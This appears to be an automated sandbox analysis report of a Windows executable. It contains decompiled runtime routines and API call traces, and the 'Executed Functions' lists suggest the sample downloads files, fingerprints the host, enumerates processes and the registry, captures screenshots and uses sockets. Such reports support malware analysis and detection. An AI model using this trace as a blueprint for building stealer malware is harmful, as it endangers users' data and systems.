                  • Instruction ID: a0093f41eda6d994e8e1248c9cc684adc6a7dad3323883db2e81e9ef6f030ed7
                  • Opcode Fuzzy Hash: 482a7ec7c1538f4dcfcac1c3ce06f56321dca5e2e73b5d8e38b13513c69ed0e2
                  • Instruction Fuzzy Hash: 58F0F4315443556ADB206B29EC02FAB3B4DEF40726F14003BF909FA6E2D7349E90828C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 91%
                  			E0040B81D(void* __eax, void* __esi) {
                  				int _t5;
                  				void* _t9;
                  				void* _t15;
                  				void** _t17;
                  				void* _t19;
                  
                  				_t15 = __esi +  *((intOrPtr*)(_t19 + 0x57));
                  				_t9 = 0;
                  				if( *0x477ac0 > 0) {
                  					_push(_t15);
                  					_t17 =  *0x477ac4 + 0x10;
                  					do {
                  						VirtualFree( *(_t17 - 4), 0, 0x8000);
                  						HeapFree( *0x451064, 0,  *_t17);
                  						_t17 =  &(_t17[5]);
                  						_t9 = _t9 + 1;
                  					} while (_t9 <  *0x477ac0);
                  				}
                  				HeapFree( *0x451064, 0,  *0x477ac4);
                  				_t5 = HeapDestroy( *0x451064);
                  				 *0x451064 =  *0x451064 & 0x00000000;
                  				return _t5;
                  			}









                  APIs
                  • VirtualFree.KERNEL32(?,00000000,00008000,?), ref: 0040B84B
                  • HeapFree.KERNEL32(00000000,?), ref: 0040B85B
                  • HeapFree.KERNEL32(00000000), ref: 0040B878
                  • HeapDestroy.KERNEL32 ref: 0040B882
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp
                  Similarity
                  • API ID: FreeHeap$DestroyVirtual
                  • String ID:
                  • API String ID: 765507482-0
                  • Opcode ID: dea781d90f75536c2c4e9540bc81ab10a238bc1b66f3b6966da7b4f55cc6ad9b
                  • Instruction ID: 49f223527289a946423448659bfbee9b67926336a8bb584dee585ec93c51e40f
                  • Opcode Fuzzy Hash: dea781d90f75536c2c4e9540bc81ab10a238bc1b66f3b6966da7b4f55cc6ad9b
                  • Instruction Fuzzy Hash: 85F06D32100310BFEB115F54ED86B8A3F25FB80716FA50075E60AB24B2C3726C94CB9C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0044CF50() {
                  				void* __ebx;
                  				void* __edi;
                  				intOrPtr _t1;
                  				void* _t2;
                  				intOrPtr _t8;
                  				intOrPtr _t10;
                  				intOrPtr _t12;
                  
                  				_t1 =  *0x477a9c;
                  				_t8 =  *0x46f394;
                  				_t12 = _t1;
                  				if(_t1 == 0x5dd) {
                  					SetSystemTimeAdjustment(0, 0);
                  					_t1 =  *0x477a9c;
                  				}
                  				_t10 =  *0x450100; // 0xdd409db6
                  				 *0x46f384 = _t10;
                  				if(_t1 == 0x114e) {
                  					GetFileAttributesW(0);
                  					_t1 =  *0x477a9c;
                  				}
                  				if(_t1 == 0xa57) {
                  					TerminateProcess(0, 0);
                  				}
                  				_t2 = E0044CEC0(_t8, _t12);
                  				if( *0x477a9c == 0x568) {
                  					return SizeofResource(0, 0);
                  				}
                  				return _t2;
                  			}











                  APIs
                  • SetSystemTimeAdjustment.KERNEL32 ref: 0044CF6A
                  • GetFileAttributesW.KERNEL32(00000000), ref: 0044CF8A
                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 0044CFA0
                  • SizeofResource.KERNEL32(00000000,00000000), ref: 0044CFBD
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp
                  Similarity
                  • API ID: AdjustmentAttributesFileProcessResourceSizeofSystemTerminateTime
                  • String ID:
                  • API String ID: 835657949-0
                  • Opcode ID: c7c6253ac80d24948a52e079fe0131289d2174b8ce9170a856baea8b7c5318a6
                  • Instruction ID: 5b4c0bc44df70d089e2735ecb56adace77b56ed44e52e91cfa2bf8eccc7b1cf3
                  • Opcode Fuzzy Hash: c7c6253ac80d24948a52e079fe0131289d2174b8ce9170a856baea8b7c5318a6
                  • Instruction Fuzzy Hash: D6F03A322497009BF7609B64FC89B0A3765F304B12F644036E60CD67E1D7A869848E2D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 90%
                  			E0040EDEF(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
                  				signed int _t13;
                  				intOrPtr _t28;
                  				void* _t29;
                  				void* _t30;
                  
                  				_t30 = __eflags;
                  				_t26 = __edi;
                  				_t25 = __edx;
                  				_t22 = __ebx;
                  				_push(0xc);
                  				_push(0x47e3c8);
                  				E004041C4(__ebx, __edi, __esi);
                  				_t28 = E0040694F(__ebx, __edx, __edi, _t30);
                  				_t13 =  *0x44fc64; // 0xfffffffe
                  				if(( *(_t28 + 0x70) & _t13) == 0) {
                  					L6:
                  					E0040CFC1(_t22, 0xc);
                  					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
                  					_t8 = _t28 + 0x6c; // 0x6c
                  					_t26 =  *0x44fd48; // 0x44fc70
                  					 *((intOrPtr*)(_t29 - 0x1c)) = E0040EDB1(_t8, _t26);
                  					 *(_t29 - 4) = 0xfffffffe;
                  					E0040EE59();
                  				} else {
                  					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
                  					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                  						goto L6;
                  					} else {
                  						_t28 =  *((intOrPtr*)(E0040694F(_t22, __edx, _t26, _t32) + 0x6c));
                  					}
                  				}
                  				if(_t28 == 0) {
                  					E00406EDE(_t25, _t26, 0x20);
                  				}
                  				return E00404209(_t28);
                  			}








                  APIs
                  • __getptd.LIBCMT ref: 0040EDFB
                    • Part of subcall function 0040694F: __getptd_noexit.LIBCMT ref: 00406952
                    • Part of subcall function 0040694F: __amsg_exit.LIBCMT ref: 0040695F
                  • __getptd.LIBCMT ref: 0040EE12
                  • __amsg_exit.LIBCMT ref: 0040EE20
                  • __lock.LIBCMT ref: 0040EE30
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp
                  Similarity
                  • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                  • String ID:
                  • API String ID: 3521780317-0
                  • Opcode ID: 15f58c9301b0172e0387239efca916a9301374c61c1ce286b80ea978aea05d69
                  • Instruction ID: 3e3d4133c6a718485f5c28ecf7e0e793d7499db6af47586b5f701f391de7fb33
                  • Opcode Fuzzy Hash: 15f58c9301b0172e0387239efca916a9301374c61c1ce286b80ea978aea05d69
                  • Instruction Fuzzy Hash: 28F06D72A04719CAD720BB67C40674A72A0AF40724F11467FA8417B6D3CB3CA961CA9E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00404014() {
                  				intOrPtr _t5;
                  				intOrPtr _t6;
                  				intOrPtr _t10;
                  				void* _t12;
                  				intOrPtr _t15;
                  				intOrPtr* _t16;
                  				signed int _t19;
                  				signed int _t20;
                  				intOrPtr _t26;
                  				intOrPtr _t27;
                  
                  				_t5 =  *0x478c20;
                  				_t26 = 0x14;
                  				if(_t5 != 0) {
                  					if(_t5 < _t26) {
                  						_t5 = _t26;
                  						goto L4;
                  					}
                  				} else {
                  					_t5 = 0x200;
                  					L4:
                  					 *0x478c20 = _t5;
                  				}
                  				_t6 = E00406D1F(_t5, 4);
                  				 *0x477c18 = _t6;
                  				if(_t6 != 0) {
                  					L8:
                  					_t19 = 0;
                  					_t15 = 0x44f250;
                  					while(1) {
                  						 *((intOrPtr*)(_t19 + _t6)) = _t15;
                  						_t15 = _t15 + 0x20;
                  						_t19 = _t19 + 4;
                  						if(_t15 >= 0x44f4d0) {
                  							break;
                  						}
                  						_t6 =  *0x477c18;
                  					}
                  					_t27 = 0xfffffffe;
                  					_t20 = 0;
                  					_t16 = 0x44f260;
                  					do {
                  						_t10 =  *((intOrPtr*)(((_t20 & 0x0000001f) << 6) +  *((intOrPtr*)(0x477b00 + (_t20 >> 5) * 4))));
                  						if(_t10 == 0xffffffff || _t10 == _t27 || _t10 == 0) {
                  							 *_t16 = _t27;
                  						}
                  						_t16 = _t16 + 0x20;
                  						_t20 = _t20 + 1;
                  					} while (_t16 < 0x44f2c0);
                  					return 0;
                  				} else {
                  					 *0x478c20 = _t26;
                  					_t6 = E00406D1F(_t26, 4);
                  					 *0x477c18 = _t6;
                  					if(_t6 != 0) {
                  						goto L8;
                  					} else {
                  						_t12 = 0x1a;
                  						return _t12;
                  					}
                  				}
                  			}














                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp
                  Similarity
                  • API ID: __calloc_crt
                  • String ID: |G
                  • API String ID: 3494438863-2889776443
                  • Opcode ID: d864ea3139a69e3665b7705cde4bf1bf089d0d8f2d1b1b18354d158635182879
                  • Instruction ID: be3a411c15aacff8a7ebef11b62c21c1e4cd2e32de436807a0a606ceca99a1ce
                  • Opcode Fuzzy Hash: d864ea3139a69e3665b7705cde4bf1bf089d0d8f2d1b1b18354d158635182879
                  • Instruction Fuzzy Hash: C711C6B17082115BF7258A2DBD5066622D5ABC8338B24453FE705FB3D0EB78D8C1868D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 30%
                  			E00401900() {
                  				intOrPtr _v8;
                  				char _v16;
                  				intOrPtr _v20;
                  				char _v24;
                  				char _v40;
                  				char _v44;
                  				char _v84;
                  				signed int _t12;
                  				void* _t21;
                  				void* _t25;
                  				void* _t26;
                  				signed int _t29;
                  
                  				_push(0xffffffff);
                  				_push(E0044EC98);
                  				_push( *[fs:0x0]);
                  				_t12 =  *0x44f0d4; // 0x45b66027
                  				_t13 = _t12 ^ _t29;
                  				_push(_t12 ^ _t29);
                  				 *[fs:0x0] =  &_v16;
                  				_v20 = 0xf;
                  				_v24 = 0;
                  				_v40 = 0;
                  				E00401620( &_v44, "vector<T> too long", E00402470("vector<T> too long"));
                  				_v8 = 0;
                  				E00401090(_t13,  &_v44);
                  				_v84 = 0x47b248;
                  				E00402FB0( &_v84, 0x47e918);
                  				asm("int3");
                  				asm("int3");
                  				asm("int3");
                  				asm("int3");
                  				asm("int3");
                  				asm("int3");
                  				_push(0);
                  				return E00402D54(_t21, _t25, _t26, _t13);
                  			}
















                  APIs
                  • _strlen.LIBCMT ref: 0040193C
                  • __CxxThrowException@8.LIBCMT ref: 00401975
                    • Part of subcall function 00402FB0: RaiseException.KERNEL32(?,?,00402DB8,?,?,?,?,?,00402DB8,?,0047E950,004507A0,?,?,?), ref: 00402FF2
                    • Part of subcall function 00402D54: _malloc.LIBCMT ref: 00402D6E
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp
                  Similarity
                  • API ID: ExceptionException@8RaiseThrow_malloc_strlen
                  • String ID: vector<T> too long
                  • API String ID: 28560481-3788999226
                  • Opcode ID: c84a64312c3579ad334ff054af386ad48c5c0744a95a0f774d599943b139bbe3
                  • Instruction ID: e524f7ada34da74ab4faf928a754424169bb489ab26e1aa60b2f5b7f0744af8b
                  • Opcode Fuzzy Hash: c84a64312c3579ad334ff054af386ad48c5c0744a95a0f774d599943b139bbe3
                  • Instruction Fuzzy Hash: 7D0181F1800208ABD700EFD1CD06BEEB7B8EB15708F50062AF509766C1DBB9560887AA
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 89%
                  			E0040C19B(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
                  				intOrPtr _t17;
                  				intOrPtr* _t28;
                  				void* _t29;
                  
                  				_t30 = __eflags;
                  				_t28 = __esi;
                  				_t27 = __edi;
                  				_t26 = __edx;
                  				_t19 = __ebx;
                  				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
                  				E0040334F(__ebx, __edx, __edi, __esi, __eflags,  *((intOrPtr*)(_t29 - 0x28)));
                  				 *((intOrPtr*)(E0040694F(__ebx, __edx, __edi, __eflags) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
                  				_t17 = E0040694F(_t19, _t26, _t27, _t30);
                  				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
                  				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
                  					_t17 =  *((intOrPtr*)(__esi + 0x14));
                  					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
                  						if( *((intOrPtr*)(_t29 - 0x34)) == 0) {
                  							_t37 =  *((intOrPtr*)(_t29 - 0x1c));
                  							if( *((intOrPtr*)(_t29 - 0x1c)) != 0) {
                  								_t17 = E00403328(_t37,  *((intOrPtr*)(_t28 + 0x18)));
                  								_t38 = _t17;
                  								if(_t17 != 0) {
                  									_push( *((intOrPtr*)(_t29 + 0x10)));
                  									_push(_t28);
                  									return E0040BB4A(_t38);
                  								}
                  							}
                  						}
                  					}
                  				}
                  				return _t17;
                  			}







                  APIs
                    • Part of subcall function 0040334F: __getptd.LIBCMT ref: 00403355
                    • Part of subcall function 0040334F: __getptd.LIBCMT ref: 00403365
                  • __getptd.LIBCMT ref: 0040C1AA
                    • Part of subcall function 0040694F: __getptd_noexit.LIBCMT ref: 00406952
                    • Part of subcall function 0040694F: __amsg_exit.LIBCMT ref: 0040695F
                  • __getptd.LIBCMT ref: 0040C1B8
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp
                  Similarity
                  • API ID: __getptd$__amsg_exit__getptd_noexit
                  • String ID: csm
                  • API String ID: 803148776-1018135373
                  • Opcode ID: bb3a2d7612f5f480703136905e0ff94cb71e5a3d0bb95be6e1e9c3f96ffa3db3
                  • Instruction ID: bd73d2abc73afc3e7d3afd0a0fbd92bfe56f259b39e54f4ea741264420b91c76
                  • Opcode Fuzzy Hash: bb3a2d7612f5f480703136905e0ff94cb71e5a3d0bb95be6e1e9c3f96ffa3db3
                  • Instruction Fuzzy Hash: 66014F34C40205DACF349FA1C480A6EB7B9BF60315F54497FE841BABD1CB399991CB59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Executed Functions

                  APIs
                  • LoadLibraryA.KERNEL32(?,?,?,?,?,0040138B,?,00034A95,0040138B), ref: 004157ED
                  • GetProcAddress.KERNEL32(00000000,?), ref: 00415819
                  • GetProcAddress.KERNEL32(00000000,?), ref: 00415848
                  • CreateMutexA.KERNELBASE(00000000,00000001,?), ref: 00415872
                  • memset.MSVCRT ref: 0041589A
                  • GetUserDefaultLocaleName.KERNEL32(?,00000055), ref: 004158C0
                  • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00415B04
                  • LoadLibraryA.KERNEL32(?), ref: 00415B2F
                  • GetProcAddress.KERNEL32(00000000,?), ref: 00415B56
                  • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 00415BE8
                  • CloseHandle.KERNEL32(00000000), ref: 00415C7E
                  • CloseHandle.KERNEL32(?), ref: 00418027
                  • CloseHandle.KERNEL32(?,?), ref: 00418033
                  • CloseHandle.KERNEL32(?,?,?), ref: 0041803F
                  • CloseHandle.KERNEL32(?,?,?,?), ref: 0041804B
                  • CloseHandle.KERNEL32(?,?,?,?,?), ref: 00418057
                  • CloseHandle.KERNEL32(?), ref: 00418D2E
                  • CloseHandle.KERNEL32(?,?), ref: 00418D3A
                  • CloseHandle.KERNEL32(?), ref: 00419039
                  • CloseHandle.KERNEL32(?,?), ref: 00419045
                  • CloseHandle.KERNEL32(?,?,?), ref: 00419051
                    • Part of subcall function 0040CFBC: RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00000001,00419D1B), ref: 0040D008
                    • Part of subcall function 0040CFBC: RegQueryValueExW.ADVAPI32(00419D1B,00000000,00000000,00000000,00000000,00000800,80000001,00000000,00000000,00000001,00419D1B), ref: 0040D04E
                    • Part of subcall function 0040CFBC: RegCloseKey.ADVAPI32(00419D1B,00419D1B,00000000,00000000,00000000,00000000,00000800,80000001,00000000,00000000,00000001,00419D1B), ref: 0040D05F
                  • CloseHandle.KERNEL32(?), ref: 004190E0
                  • CloseHandle.KERNEL32(?,?), ref: 004190EC
                  • CloseHandle.KERNEL32(?,?,?), ref: 004190F8
                  • LoadLibraryA.KERNEL32(?), ref: 0041AAF9
                  • GetProcAddress.KERNEL32(00000000,?), ref: 0041AB39
                  • GetProcAddress.KERNEL32(00000000,?), ref: 0041AB6C
                  • GetProcAddress.KERNEL32(00000000,?), ref: 0041AB9F
                  • GetProcAddress.KERNEL32(00000000,?), ref: 0041ABD2
                  • GetProcAddress.KERNEL32(00000000,?), ref: 0041AC05
                  • GetProcAddress.KERNEL32(00000000,?), ref: 0041AC36
                  • memset.MSVCRT ref: 0041AE66
                  • SetLastError.KERNEL32(00000000), ref: 0041AED3
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000200,00000000), ref: 0041AEDC
                  • GetLastError.KERNEL32(00000000,?,00000200,00000000,00000000,?,00000200,00000000), ref: 0041AEE7
                  • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 0041AEF8
                  • GetLastError.KERNEL32(00000000,?,00000200,00000000,00000000,?,00000200,00000000), ref: 0041AF8E
                  • GetComputerNameW.KERNEL32 ref: 0041B0C0
                  • GetDesktopWindow.USER32 ref: 0041B584
                  • GetWindowRect.USER32 ref: 0041B58F
                  • GetSystemInfo.KERNEL32(?), ref: 0041B686
                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B744
                  • EnumDisplayDevicesW.USER32(00000000,00000000,?,00000001), ref: 0041B867
                  • GetTimeZoneInformation.KERNEL32(?), ref: 0041B9D9
                  • GetKeyboardLayoutList.USER32(00000010,?), ref: 0041BCE5
                  • GetLocaleInfoW.KERNEL32(?,00000002,?,000000FF,00000010), ref: 0041BD2E
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041BF4C
                  • Process32First.KERNEL32(00000000,?), ref: 0041BF92
                  • Process32Next.KERNEL32 ref: 0041C02D
                  • RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00020019,?), ref: 0041C1AF
                  • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041C1FE
                  • memset.MSVCRT ref: 0041C24E
                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C273
                  • RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00020019,?,00000000,00020019,?), ref: 0041C7CA
                  • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041C836
                  • memset.MSVCRT ref: 0041C8D1
                  • RegEnumKeyExW.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 0041C8F6
                  • RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00000001,00000000), ref: 0041CB9A
                  • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000800,80000001,00000000,00000000,00000001,00000000), ref: 0041CC23
                  • RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000800,80000001,00000000,00000000,00000001,00000000), ref: 0041CC38
                  • CloseHandle.KERNEL32(?), ref: 0041D3FB
                  • CloseHandle.KERNEL32(?), ref: 0041DB7D
                  • CloseHandle.KERNEL32(?), ref: 004183F9
                    • Part of subcall function 0040D33A: memset.MSVCRT ref: 0040D4F3
                    • Part of subcall function 0040D33A: SetLastError.KERNEL32(00000000), ref: 0040D551
                    • Part of subcall function 0040D33A: GetEnvironmentVariableW.KERNEL32(00000200,?,00000200,00000000), ref: 0040D55C
                    • Part of subcall function 00422783: memcpy.MSVCRT ref: 004227A7
                  • CloseHandle.KERNEL32(?), ref: 00418405
                  • CloseHandle.KERNEL32(?), ref: 0041841A
                  • CloseHandle.KERNEL32(?), ref: 0041842E
                  • GetProcessHeap.KERNEL32 ref: 0041E9E1
                  • GetSystemMetrics.USER32 ref: 0041E9E8
                  • GetSystemMetrics.USER32 ref: 0041E9F3
                  • GetDC.USER32(00000000), ref: 0041EA50
                  • GetCurrentObject.GDI32(00000000,00000007), ref: 0041EA5C
                  • GetObjectW.GDI32(00000000,00000018,?,?,?,?,?,?,?,?,0000004D,0000004C), ref: 0041EA70
                  • DeleteObject.GDI32(00000000), ref: 0041EA88
                  • CreateCompatibleDC.GDI32(?), ref: 0041EAE5
                  • CreateDIBSection.GDI32(?,?,00000000,?,00000000,00000000), ref: 0041EB03
                  • SelectObject.GDI32(00000000,00000000), ref: 0041EB0A
                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 0041EB2A
                  • closesocket.WS2_32(?), ref: 0041ECD1
                  • closesocket.WS2_32(?), ref: 0041EE40
                    • Part of subcall function 0042A63B: shutdown.WS2_32(?,00000002), ref: 0042A648
                  • memset.MSVCRT ref: 0041F851
                    • Part of subcall function 00420300: GetProcessHeap.KERNEL32(?,00425BEA,?,?,00425BB3,?,004281D8,?,?,?,004281C2,?,?,00428105), ref: 00420308
                    • Part of subcall function 00420300: HeapFree.KERNEL32(00000000,00000000,?,?,00425BEA,?,?,00425BB3,?,004281D8,?,?,?,004281C2,?), ref: 0042031B
                  • SetLastError.KERNEL32(00000000), ref: 0041F8C4
                  • GetTempPathW.KERNEL32(00000200,?,00000000), ref: 0041F8CB
                  • GetLastError.KERNEL32(00000200,00000002,00000000,00000200,?,00000000), ref: 0041F8D6
                  • GetLastError.KERNEL32(00000200,?,00000000), ref: 0041F8E7
                  • CloseHandle.KERNEL32(00000000), ref: 0041FC24
                  • LoadLibraryA.KERNEL32(?,00000000), ref: 0041FC5D
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0041FC6A
                  • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 0041FD63
                  • closesocket.WS2_32(?), ref: 0041FE88
                  • GetLastError.KERNEL32(00000200,00000002,00000000,00000200,?,00000000), ref: 0042015A
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID: Close$Handle$AddressProc$ErrorLast$memset$CreateLibraryLoad$InfoObjectOpenQuery$EnumHeapNameProcessSystemclosesocket$FileLocaleMetricsProcess32ValueWindow$CompatibleComputerCurrentDefaultDeleteDesktopDevicesDisplayDownloadEnvironmentFirstFreeGlobalInformationKeyboardLayoutListMemoryModuleMutexNextPathRectSectionSelectSnapshotStatusTempTimeToolhelp32UserVariableZonememcpyshutdown
                  • String ID: b9$assertion failed: key != 0WakeConditionVariable$"SomeNone$$zC$..\\?\.\UNC\Windows stdio in console mode does not support writing non-UTF-8 byte sequences$53@$<vC$<vC$@$@pC$GetSystemTimePreciseAsFileTime$Ow(T$\data provided contains a nul byteSleepConditionVariableSRWkernel32ReleaseSRWLockExclusiveAcquireSRWLockExclusive$\xC$dresses$failed to write whole buffer:$kernel32.dll$p0D$<@
                  • API String ID: 4233855127-4045763725
                  • Opcode ID: 4b24dc7c212a0d432420b118860d6e6e31ea1172a2f035c1e9c838b3c45a3f94
                  • Instruction ID: 61271da333d6c0335346d8ad7565baa6346cf4c4da69aae8c8a6070b7f0dad69
                  • Opcode Fuzzy Hash: 4b24dc7c212a0d432420b118860d6e6e31ea1172a2f035c1e9c838b3c45a3f94
                  • Instruction Fuzzy Hash: AD245D716087818BD335DF24C891BDBB7E5FFC9304F10492EE48A9B291DB78A945CB86
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • memset.MSVCRT ref: 0042BE2F
                  • FindFirstFileW.KERNEL32(?,?,?,?,?,?,0042B751,?), ref: 0042BE39
                  • memcpy.MSVCRT ref: 0042BEA7
                  • memcpy.MSVCRT ref: 0042BEF1
                  • GetLastError.KERNEL32(?,?,?,?,?,?,0042B751,?), ref: 0042BF1C
                    • Part of subcall function 00429821: memcpy.MSVCRT ref: 0042992F
                    • Part of subcall function 00429821: memcpy.MSVCRT ref: 0042994A
                    • Part of subcall function 00429821: memcpy.MSVCRT ref: 00429982
                    • Part of subcall function 00429821: memcpy.MSVCRT ref: 00429A25
                  • memcpy.MSVCRT ref: 0042BFCD
                  • memcpy.MSVCRT ref: 0042C003
                  • memcpy.MSVCRT ref: 0042C0FC
                  • memcpy.MSVCRT ref: 0042C235
                    • Part of subcall function 00429821: memset.MSVCRT ref: 004299A9
                    • Part of subcall function 00429821: FindNextFileW.KERNEL32(?,?), ref: 004299C4
                    • Part of subcall function 00429821: GetLastError.KERNEL32(?,?), ref: 004299F0
                  • memcpy.MSVCRT ref: 0042C35F
                  • memmove.MSVCRT ref: 0042C62A
                  • memcpy.MSVCRT ref: 0042C8B4
                  • memcpy.MSVCRT ref: 0042C933
                  • memcpy.MSVCRT ref: 0042C9B7
                  • memmove.MSVCRT ref: 0042C9FE
                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,0042B751,?), ref: 0042CB07
                  • memcpy.MSVCRT ref: 0042CCBC
                  • memcpy.MSVCRT ref: 0042CD93
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID: memcpy$ErrorFileFindLastmemmovememset$CloseFirstHandleNext
                  • String ID:
                  • API String ID: 999017993-0
                  • Opcode ID: b3b0615f26c499943fa6eba0d94bd0ff6bc9c337c9b0f635e8b7767b7750fc94
                  • Instruction ID: ac13f3e1733af14886f6c64beaa8a3535c0925d813efdd87042ab05e0ad990bd
                  • Opcode Fuzzy Hash: b3b0615f26c499943fa6eba0d94bd0ff6bc9c337c9b0f635e8b7767b7750fc94
                  • Instruction Fuzzy Hash: D3B27971A083518FD734CF14D480BAFB7E2BFC8314F508A2EE98997251DB74A946CB86
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • Sleep.KERNEL32(000003E8), ref: 0040EBAA
                  • getaddrinfo.WS2_32(?,00000000,00000000,00000000), ref: 0040EE57
                  • WSAGetLastError.WS2_32 ref: 0040EE66
                  • memcpy.MSVCRT ref: 0040EEFA
                  • freeaddrinfo.WS2_32(?), ref: 0040EF8C
                  Strings
                  • data provided contains a nul byteSleepConditionVariableSRWkernel32ReleaseSRWLockExclusiveAcquireSRWLockExclusive, xrefs: 0040EDFE
                  • :, xrefs: 0040EA8E
                  • invalid socket addressinvalid port valuestrings passed to WinAPI cannot contain NULsinvalid utf-8: corrupt contentsinvalid utf-8stream did not contain valid UTF-8, xrefs: 0040EB2E
                  • could not resolve to any addresses, xrefs: 0040ED63
                  Memory Dump Source
                  • Source File: 00000003.00000002.350169778.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000003.00000002.350194990.0000000000437000.00000040.00000001.sdmp
                  • Associated: 00000003.00000002.350203287.0000000000444000.00000040.00000001.sdmp
                  Similarity
                  • API ID: ErrorLastSleepfreeaddrinfogetaddrinfomemcpy
